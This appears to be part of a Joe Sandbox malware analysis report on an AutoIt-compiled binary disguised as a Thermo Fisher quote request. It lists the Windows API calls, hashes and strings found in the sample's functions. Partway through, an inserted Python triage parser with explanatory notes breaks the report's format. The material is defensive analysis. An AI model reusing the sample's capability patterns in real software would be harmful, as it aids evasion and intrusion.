                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                              • String ID:
                                                              • API String ID: 3016257755-0
                                                              • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                              • Instruction ID: d82ac1f5a7186fa27b1b16c4210a4880429131c6321d6d5a15e59827fbb3c4de
                                                              • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                              • Instruction Fuzzy Hash: 8A014C3200014EBBCF525E84DC018EE7F63BB18391F588455FE1959131DB36EAB2AB85
                                                              APIs
                                                                • Part of subcall function 00627A0D: __getptd_noexit.LIBCMT ref: 00627A0E
                                                              • __lock.LIBCMT ref: 0062748F
                                                              • InterlockedDecrement.KERNEL32(?), ref: 006274AC
                                                              • _free.LIBCMT ref: 006274BF
                                                              • InterlockedIncrement.KERNEL32(00BA2B88), ref: 006274D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                              • String ID:
                                                              • API String ID: 2704283638-0
                                                              • Opcode ID: 3d7cf9c1626bdaa361747204596efe29fe574e70b23f8046bb13d38699b01595
                                                              • Instruction ID: 6e5dbe9269177b1d92e33b0e15426f2fbc2212e8aa2a445feb378f14e1dd5575
                                                              • Opcode Fuzzy Hash: 3d7cf9c1626bdaa361747204596efe29fe574e70b23f8046bb13d38699b01595
                                                              • Instruction Fuzzy Hash: CA01E131909E30ABC751BF65B905B9DBBA3BF05711F144109F814A7381CB345940CFD6
                                                              APIs
                                                                • Part of subcall function 0061AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0061AFE3
                                                                • Part of subcall function 0061AF83: SelectObject.GDI32(?,00000000), ref: 0061AFF2
                                                                • Part of subcall function 0061AF83: BeginPath.GDI32(?), ref: 0061B009
                                                                • Part of subcall function 0061AF83: SelectObject.GDI32(?,00000000), ref: 0061B033
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0066EA8E
                                                              • LineTo.GDI32(00000000,?,?), ref: 0066EA9B
                                                              • EndPath.GDI32(00000000), ref: 0066EAAB
                                                              • StrokePath.GDI32(00000000), ref: 0066EAB9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                              • String ID:
                                                              • API String ID: 1539411459-0
                                                              • Opcode ID: b21952198682d99b4eee9e0edc36b47262a53b281e83c88b4485146ab0b7c97d
                                                              • Instruction ID: de899c2959e36a0f40db5eaa583898f7436b34f268ab8370c8308598588aea68
                                                              • Opcode Fuzzy Hash: b21952198682d99b4eee9e0edc36b47262a53b281e83c88b4485146ab0b7c97d
                                                              • Instruction Fuzzy Hash: 3BF08231005259BBDB12AF94AC0DFCE3F1BAF06311F084201FA11651E1C7B55652DBE9
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0063C84A
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0063C85D
                                                              • GetCurrentThreadId.KERNEL32 ref: 0063C864
                                                              • AttachThreadInput.USER32(00000000), ref: 0063C86B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 2710830443-0
                                                              • Opcode ID: 1809b812d48678a6dfabde0ae427516c8a5753b9d11983cd1e81e68234706b16
                                                              • Instruction ID: c54f88d7a7cffef0106b776ca0b4ad26fd7c96b8ad7b9c977bcb488c9ebcddf1
                                                              • Opcode Fuzzy Hash: 1809b812d48678a6dfabde0ae427516c8a5753b9d11983cd1e81e68234706b16
                                                              • Instruction Fuzzy Hash: 4DE06D71141228BADB201BA2DC0DEDB7F2EEF067B1F008121B60D944A0D6B1C681DBF0
                                                              APIs
                                                              • GetCurrentThread.KERNEL32 ref: 0063B0D6
                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,0063AC9D), ref: 0063B0DD
                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0063AC9D), ref: 0063B0EA
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,0063AC9D), ref: 0063B0F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CurrentOpenProcessThreadToken
                                                              • String ID:
                                                              • API String ID: 3974789173-0
                                                              • Opcode ID: be76aee3842c1d791950dfc984321e04a4cc03e04803148a43f1ca8ffd57fd6a
                                                              • Instruction ID: c1dae23c6f49f559b173ba7c2a8e63a5aa7cb1817fa6026fbc591e69b86e02f1
                                                              • Opcode Fuzzy Hash: be76aee3842c1d791950dfc984321e04a4cc03e04803148a43f1ca8ffd57fd6a
                                                              • Instruction Fuzzy Hash: 4BE04F32601211ABD7202FB15C0CF873BAAAF55795F119918A281D6080DB7484018771
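The records above list, per function, the Win32 APIs Joe Sandbox resolved in the disassembly, and the Similarity block's API String ID serves as a stable per-function key. As an added example (not part of the Joe Sandbox report or its tooling), the Python below parses records in exactly this layout from a constructed sample copied from the entries above, separates direct calls from those attributed to a subcall, and applies a few triage rules. The rule set (token access, AttachThreadInput, UnloadUserProfile) is my own analyst heuristic, not a detection the report makes.

```python
"""Parse Joe Sandbox function-similarity records (the APIs / Similarity blocks
above) into per-function API sets and apply a few triage rules."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: four records copied in the shape of the entries above.
SAMPLE = """\
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0063C84A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0063C85D
• GetCurrentThreadId.KERNEL32 ref: 0063C864
• AttachThreadInput.USER32(00000000), ref: 0063C86B
Memory Dump Source
• Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
APIs
• GetCurrentThread.KERNEL32 ref: 0063B0D6
• OpenThreadToken.ADVAPI32(00000000,?,?,?,0063AC9D), ref: 0063B0DD
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0063AC9D), ref: 0063B0EA
• OpenProcessToken.ADVAPI32(00000000,?,?,?,0063AC9D), ref: 0063B0F1
Similarity
• API String ID: 3974789173-0
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0063B2DF
• UnloadUserProfile.USERENV(?,?), ref: 0063B2EB
• CloseHandle.KERNEL32(?), ref: 0063B2F4
• CloseHandle.KERNEL32(?), ref: 0063B2FC
  • Part of subcall function 0063AB24: GetProcessHeap.KERNEL32(00000000,?,0063A848), ref: 0063AB2B
  • Part of subcall function 0063AB24: HeapFree.KERNEL32(00000000), ref: 0063AB32
Similarity
• API String ID: 146765662-0
APIs
• GetWindowDC.USER32(?,00000000), ref: 0067DE2B
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0067DE38
• ReleaseDC.USER32(?,00000000), ref: 0067DE95
Similarity
• API String ID: 1946975507-0
"""

# One API line: optional "Part of subcall function ADDR:" prefix, API.MODULE,
# optional "(args)" (absent for zero-argument calls), then ", ref: ADDR".
CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)

@dataclass
class Call:
    api: str
    module: str
    args: tuple
    ref: str
    subcall_of: str | None  # callee address when the call is attributed to a subcall

@dataclass
class Record:
    calls: list = field(default_factory=list)
    api_string_id: str = ""  # Joe Sandbox's per-function key from the Similarity block

    def apis(self, include_subcalls=True):
        return {c.api for c in self.calls if include_subcalls or c.subcall_of is None}

def parse_records(text):
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # every record opens with this header
            current = Record()
            records.append(current)
            section = "apis"
        elif line in ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            section = line
        elif current is not None and line.startswith("•"):
            body = line[1:].strip()
            if section == "apis":
                m = CALL_RE.match(body)
                if not m:
                    raise ValueError(f"unrecognised API line: {body!r}")
                args = tuple(a for a in (m["args"] or "").split(",") if a)
                current.calls.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"]))
            elif section == "Similarity" and body.startswith("API String ID:"):
                current.api_string_id = body.split(":", 1)[1].strip()
    return records

# Analyst triage rules (my assumptions, not findings made by the report):
# API combinations worth opening first in the disassembly.
TRIAGE_RULES = {
    "token-access": {"OpenProcessToken", "OpenThreadToken"},
    "thread-input-attach": {"AttachThreadInput"},
    "user-profile-unload": {"UnloadUserProfile"},
}

def triage(records):
    """Map each rule name to the API String IDs of the functions that trip it."""
    hits = {}
    for rec in records:
        for tag, needles in TRIAGE_RULES.items():
            if needles & rec.apis():
                hits.setdefault(tag, []).append(rec.api_string_id)
    return hits

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        print(rec.api_string_id, sorted(rec.apis(include_subcalls=False)))
    print(triage(recs))
```

The rules pick out Windows behaviours that deserve a look regardless of which sample they appear in: OpenProcessToken/OpenThreadToken is the standard way to inspect the caller's own privilege level before deciding what to do next; AttachThreadInput joins this thread's input queue to another window's thread, which is how a runtime forces focus or injects keystrokes; UnloadUserProfile is only meaningful after LoadUserProfile, i.e. after something was run under different credentials. Because the report flags this binary as a compiled AutoIt script, many of these functions are AutoIt runtime library code rather than the payload, so the triage output is a reading order for the disassembly, not a verdict.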
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 0061B496
                                                              • SetTextColor.GDI32(?,000000FF), ref: 0061B4A0
                                                              • SetBkMode.GDI32(?,00000001), ref: 0061B4B5
                                                              • GetStockObject.GDI32(00000005), ref: 0061B4BD
                                                              • GetWindowDC.USER32(?,00000000), ref: 0067DE2B
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0067DE38
                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0067DE51
                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0067DE6A
                                                              • GetPixel.GDI32(00000000,?,?), ref: 0067DE8A
                                                              • ReleaseDC.USER32(?,00000000), ref: 0067DE95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                              • String ID:
                                                              • API String ID: 1946975507-0
                                                              • Opcode ID: 52c9542a9a9fa4bca9bb33aebabf4a49cbbe0a718fb48747c009f36d6b044a3a
                                                              • Instruction ID: 8f4b7215f2fc86a7098a1b9e5aebd9dfbf9b6b4c1f19aae0d9aada355edf3b35
                                                              • Opcode Fuzzy Hash: 52c9542a9a9fa4bca9bb33aebabf4a49cbbe0a718fb48747c009f36d6b044a3a
                                                              • Instruction Fuzzy Hash: 60E0ED31100240BADF216B64EC0DBD87B63AF56339F14D766F6A9580E5C7714981DB21
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0063B2DF
                                                              • UnloadUserProfile.USERENV(?,?), ref: 0063B2EB
                                                              • CloseHandle.KERNEL32(?), ref: 0063B2F4
                                                              • CloseHandle.KERNEL32(?), ref: 0063B2FC
                                                                • Part of subcall function 0063AB24: GetProcessHeap.KERNEL32(00000000,?,0063A848), ref: 0063AB2B
                                                                • Part of subcall function 0063AB24: HeapFree.KERNEL32(00000000), ref: 0063AB32
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                              • String ID:
                                                              • API String ID: 146765662-0
                                                              • Opcode ID: a7d38b472126b72ffc2d864af9fd828799f54f701e4a24b8f45939523dbf81ed
                                                              • Instruction ID: 926638aa0197a0391c4a9e898424b3c5f8b32eaeaf16dbde6abc089ccfab3ff5
                                                              • Opcode Fuzzy Hash: a7d38b472126b72ffc2d864af9fd828799f54f701e4a24b8f45939523dbf81ed
                                                              • Instruction Fuzzy Hash: 5BE0B63A104005BBDB012FA5EC08859FBA7FF993613109321F625815B1CB32A871EBA1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              APIs
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              APIs
                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0063DEAA
                                                              Strings
                                                              Similarity
                                                              • API ID: ContainedObject
                                                              • String ID: AutoIt3GUI$Container
                                                              • API String ID: 3565006973-3941886329
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcscpy
                                                              • String ID: I/g$I/g
                                                              • API String ID: 3048848545-13021658
                                                              APIs
                                                              • Sleep.KERNEL32(00000000), ref: 0061BCDA
                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 0061BCF3
                                                              Strings
                                                              Similarity
                                                              • API ID: GlobalMemorySleepStatus
                                                              • String ID: @
                                                              • API String ID: 2783356886-2766056989
                                                              APIs
                                                                • Part of subcall function 006044ED: __fread_nolock.LIBCMT ref: 0060450B
                                                              • _wcscmp.LIBCMT ref: 0064C65D
                                                              • _wcscmp.LIBCMT ref: 0064C670
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcscmp$__fread_nolock
                                                              • String ID: FILE
                                                              • API String ID: 4029003684-3121273764
                                                              APIs
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0066A85A
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0066A86F
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: '
                                                              • API String ID: 3850602802-1997036262
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?,?), ref: 0066980E
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0066984A
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$DestroyMove
                                                              • String ID: static
                                                              • API String ID: 2139405536-2160076837
                                                              APIs
                                                              • _memset.LIBCMT ref: 006451C6
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00645201
                                                              Strings
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: __snwprintf
                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                              • API String ID: 2391506597-2584243854
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0066945C
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00669467
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: Combobox
                                                              • API String ID: 3850602802-2096851135
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • GetActiveWindow.USER32 ref: 0066DA7B
                                                              • EnumChildWindows.USER32(?,0066D75F,00000000), ref: 0066DAF5
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$ActiveChildEnumLongWindows
                                                              • String ID: T1e
                                                              • API String ID: 3814560230-1869729051
                                                              APIs
                                                                • Part of subcall function 0061D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0061D1BA
                                                                • Part of subcall function 0061D17C: GetStockObject.GDI32(00000011), ref: 0061D1CE
                                                                • Part of subcall function 0061D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0061D1D8
                                                              • GetWindowRect.USER32(00000000,?), ref: 00669968
                                                              • GetSysColor.USER32(00000012), ref: 00669982
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                              • String ID: static
                                                              • API String ID: 1983116058-2160076837
                                                              • Opcode ID: f20b5cfa2c93be8cf0006f75bdf44c2d2daeee7ff671e2eab34cd503af3881a7
                                                              • Instruction ID: 69f1d7a59d38aeed64ac727cb8f2eb2fece2152a1d0c7e34d4efdcfaeafea663
                                                              • Instruction Fuzzy Hash: 6D114472620209BFDB04DFB8C845AFA7BAAFB08344F051629FD55E2250E634E851DB60
                                                              APIs
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00669699
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006696A8
                                                              Strings
                                                              Similarity
                                                              • API ID: LengthMessageSendTextWindow
                                                              • String ID: edit
                                                              • API String ID: 2978978980-2167791130
                                                              • Opcode ID: aec0598e28088ac9d8bf803874813cfe5c2f097de726ea0a43a068d921b5cf00
                                                              • Instruction ID: 3cc1d48b9937fb0f1d9893c523ed0aa129c3fcaed7e1b35f7ad4d6de3c6c86dc
                                                              • Instruction Fuzzy Hash: 56114371100208AAEF109FA4DC80AEA3B6FEB053A8F504324FD65D62E0C6359C91AB60
                                                              APIs
                                                              • _memset.LIBCMT ref: 006452D5
                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006452F4
                                                              Strings
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: 6091fd87d5d213421452bcaed736b1be182083b66c4e370d348ed239b2cc18b9
                                                              • Instruction ID: 3e79a53916f8de88bf08fb8e1f7dddc98740438e7b27fff2c675a616a86b2252
                                                              • Instruction Fuzzy Hash: 9211D375901614ABDB11EF98DD04FEA77AAAB07B50F040116E903A7296E3B0AE04C7A1
                                                              APIs
                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00654DF5
                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00654E1E
                                                              Strings
                                                              Similarity
                                                              • API ID: Internet$OpenOption
                                                              • String ID: <local>
                                                              • API String ID: 942729171-4266983199
                                                              • Opcode ID: d5c0f9c7563e99ba8661dae70933b0001403838c7d1c33ed6cde6f9f8bab2e62
                                                              • Instruction ID: 5fbdd86f643b0fbac60ca9a2d742c5a66c8788595b37f2865eb4174a2da5fb8f
                                                              • Instruction Fuzzy Hash: 8E11A070501221BBDB258F51CC89EFBFBBAFF0675AF10826AF90556240DB705989D6F0
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006337A7
                                                              • ___raise_securityfailure.LIBCMT ref: 0063388E
                                                              Strings
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                              • String ID: (l
                                                              • API String ID: 3761405300-951426420
                                                              • Opcode ID: cf4d220777b5602cb11e574e325464bfa94c0d9b58d297054c6f1ce31069c94d
                                                              • Instruction ID: 64018807fb4b80f7b6cc5570db916a03661a888040fb872b76769f4e856aedc6
                                                              • Instruction Fuzzy Hash: 0C21C2F5591204DAF740DF55F999A603BB7BB4C314F10682AE5058B3B1E3F1A981CF89
                                                              APIs
                                                              • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0065A84E
                                                              • htons.WSOCK32(00000000,?,00000000), ref: 0065A88B
                                                              Strings
                                                              Similarity
                                                              • API ID: htonsinet_addr
                                                              • String ID: 255.255.255.255
                                                              • API String ID: 3832099526-2422070025
                                                              • Opcode ID: 7355dabda6f97fa8f169d9c4e3a7548fd7e6ac27a554a3470711d1048c7c4f88
                                                              • Instruction ID: 09e29ec1ebd55dc8d7ede9d70ee2274859617a8c5344f7c105d1e6ffcce91c3a
                                                              • Instruction Fuzzy Hash: 5001D675200304ABCB109FA8D846FE9B766EF44721F10866AF915973D1D771E8098756
                                                              APIs
                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0063B7EF
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 6c490465c9fee8216d6bfddcc711b8988f264c3a9f44f589ce7c657d4215d656
                                                              • Instruction ID: 831d04f617421ddbc072e0fb7447cf0c07aacf24107dde0b2718d3dc57f4f726
                                                              • Instruction Fuzzy Hash: E101B1B1641118ABCB48EBA8CC529FE73BBEF45360B04071DF562672D2EB70590887A4
                                                              APIs
                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 0063B6EB
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: de7af55c70316a335f15806dd2ffeb42baafe84a25b1ac8b7bf973a873478d13
                                                              • Instruction ID: 6489c2f25b6b9cdc77d987402554f061c1e1409895d56291020a254d9df6d3b0
                                                              • Instruction Fuzzy Hash: 7601A2B1681008ABCB48EBA4C963EFF73AA9F06350F10111DB502B32D2EF505E1887F9
                                                              APIs
                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 0063B76C
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 45fc54e9e2f8c74916676ead4a5887794cca675dc1bb056648c1a6e24fdfd9b2
                                                              • Instruction ID: 0ed79a76eba1c35e807394ec665c0b6b56acf594d1b340ba67b9e9d7b05ebc9f
                                                              • Instruction Fuzzy Hash: 32018BB1680108ABCB44EBA8D952AFF73AADB05350F10011DB902B32D2EB605E0987F9
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: __calloc_crt
                                                              • String ID: "l
                                                              • API String ID: 3494438863-126353359
                                                              • Opcode ID: b73097aa8f06fbc209ada6a55116b19c611dfe834de3b4bc6e93a378dc73cdb5
                                                              • Instruction ID: 970a0c40f801610b1b97dad524fdb0dfce74552f89fdbe08cdfae4584e5bc47a
                                                              • Instruction Fuzzy Hash: 94F0C871209B239AF7149F59FC61EB6A7D7EB04B60F10491EF601CA294EF34C9814F98
                                                              APIs
                                                              • LoadImageW.USER32(00600000,00000063,00000001,00000010,00000010,00000000), ref: 00604048
                                                              • EnumResourceNamesW.KERNEL32(00000000,0000000E,006467E9,00000063,00000000,75A90280,?,?,00603EE1,?,?,000000FF), ref: 006741B3
                                                              Strings
                                                              Similarity
                                                              • API ID: EnumImageLoadNamesResource
                                                              • String ID: >`
                                                              • API String ID: 1578290342-3896962745
                                                              • Opcode ID: 08c953988d513a201e4e5fe29fc084df8b6879d6e5a87e33ec02bbad15a59ade
                                                              • Instruction ID: 6c25527aaeec587f59fdd0a6086f5abd190f08de8aa2927b68c6c159c1dd8f8e
                                                              • Instruction Fuzzy Hash: 30F06D71740350BBE3205B1AEC4AFE23BABA757BB5F101106F325AA1D1D6E090908BA4
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: ClassName_wcscmp
                                                              • String ID: #32770
                                                              • API String ID: 2292705959-463685578
                                                              • Opcode ID: edb111bf6686729ef2cba75ab5302d0974446cb4f1300a0b70126ef70cb38f44
                                                              • Instruction ID: 6fb40689dfcece01cd422787099ded2fe04a3809eaac9ce358fcb37167866d57
                                                              • Instruction Fuzzy Hash: BEE0927760427827D710AAA5AC09EDBFBADAB51760F01015AB905E3181E670A64187E4
                                                              APIs
                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0063A63F
